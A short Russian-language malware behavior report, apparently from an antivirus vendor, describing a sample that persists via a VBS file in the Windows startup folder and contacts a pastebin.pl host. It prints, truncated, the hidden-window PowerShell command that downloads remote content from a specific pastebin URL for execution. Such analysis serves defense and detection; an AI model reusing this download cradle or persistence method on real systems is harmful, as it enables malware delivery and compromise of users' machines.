Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
Сетевая активность
Подключается к
- 'pa##ebin.pl':443
TCP
- 'pa##ebin.pl':443
UDP
- DNS ASK pa##ebin.pl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $http = [System.Net.HttpWebRequest]::Create('https://pastebin.pl/view/raw/5cd294ab'); $webres = $http.GetResponse(); $mem = $webres.GetResponseStream(); $sr = [IO.StreamReader]::new($mem); $dat...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $http = [System.Net.HttpWebRequest]::Create('https://pastebin.pl/view/raw/5cd294ab'); $webres = $http.GetResponse(); $mem = $webres.GetResponseStream(); $sr = [IO.StreamReader]::new($mem); $dat...
